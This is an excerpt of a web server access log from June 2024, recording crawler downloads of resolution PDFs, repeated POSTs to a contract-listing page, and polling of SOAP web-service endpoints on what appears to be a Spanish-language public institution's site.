201.245.192.253 - - [29/Jun/2024:15:51:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.154.37.112 - - [29/Jun/2024:15:52:06 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 305988
27.184.144.196 - - [29/Jun/2024:15:52:09 -0500] "GET / HTTP/1.1" 200 319
66.249.66.11 - - [29/Jun/2024:15:52:19 -0500] "GET /BLA/resoluciones/AUTOS%202014/4183.pdf HTTP/1.1" 200 312829
186.154.37.112 - - [29/Jun/2024:15:52:21 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 150641
66.249.66.11 - - [29/Jun/2024:15:52:24 -0500] "GET /resoluciones/RESOLUCIONES%202009/7465.pdf HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:15:52:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5142.pdf HTTP/1.1" 200 769579
66.249.66.11 - - [29/Jun/2024:15:52:55 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/2604.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:15:52:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:53:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.154.37.112 - - [29/Jun/2024:15:53:34 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:53:40 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:53:42 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
172.22.2.4 - - [29/Jun/2024:15:52:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.49 - - [29/Jun/2024:15:53:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/3247.pdf HTTP/1.1" 200 861759
66.249.66.13 - - [29/Jun/2024:15:53:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0602.pdf HTTP/1.1" 200 701011
201.245.192.253 - - [29/Jun/2024:15:53:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:53:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.154.37.112 - - [29/Jun/2024:15:54:14 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:54:15 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:54:15 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:54:16 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
172.22.2.4 - - [29/Jun/2024:15:53:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
66.249.66.11 - - [29/Jun/2024:15:54:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5112.pdf HTTP/1.1" 200 516582
201.245.192.253 - - [29/Jun/2024:15:54:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.154.37.112 - - [29/Jun/2024:15:55:07 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:55:09 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
186.154.37.112 - - [29/Jun/2024:15:55:09 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/listarContrato.xhtml HTTP/1.1" 200 8733
66.249.66.12 - - [29/Jun/2024:15:55:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3238.pdf HTTP/1.1" 200 465903
201.245.192.253 - - [29/Jun/2024:15:55:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:55:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:15:55:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0193.pdf HTTP/1.1" 200 981497
66.249.66.13 - - [29/Jun/2024:15:56:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5289.pdf HTTP/1.1" 200 1410339
172.22.2.4 - - [29/Jun/2024:15:56:18 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [29/Jun/2024:15:56:18 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:18 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:18 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:15:56:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [29/Jun/2024:15:56:49 -0500] "HEAD / HTTP/1.1" 200 -
47.91.125.252 - - [29/Jun/2024:15:56:51 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [29/Jun/2024:15:56:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:15:56:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0239.pdf HTTP/1.1" 200 343554
66.249.66.11 - - [29/Jun/2024:15:56:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20501-550/00000540.tif HTTP/1.1" 200 64796
186.102.106.90 - - [29/Jun/2024:15:57:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+vLxvFqFblgkhUtNyfy9j5DxF8Lxt7nnvywYIGZaEdBgBsfV0MPWXTXFAnsssz1/d/+WTMG2+ebnIARJWtiNnUMtleZqLLxFj5KtntUsFjkY+meq7q9BXenHvlC35Kc10ytMFgwc4+HEoo8Xzj2MuhjugyR4SNC8z2jWr16XrIMo+f1EB5RCPhT9GG16mGOXhdiEPIvxt4mc9mMsqE4CLNKWg+TzX+0/w3Z44B84zQvruWkMkttE159YuDd4CHoI/XgJOd0W+D3A==&u=U2FsdGVkX1/6pM/Hd+hhvHeSnJ8Md12AIXtBPgjlXdTju/Va7jBnZVExra2pYpXV&y=U2FsdGVkX1+s8jxl9+0nwe8nVsRooaqMfkh8rydOr0LZjcheUm0HO7DsGEQt02eF HTTP/1.1" 200 26
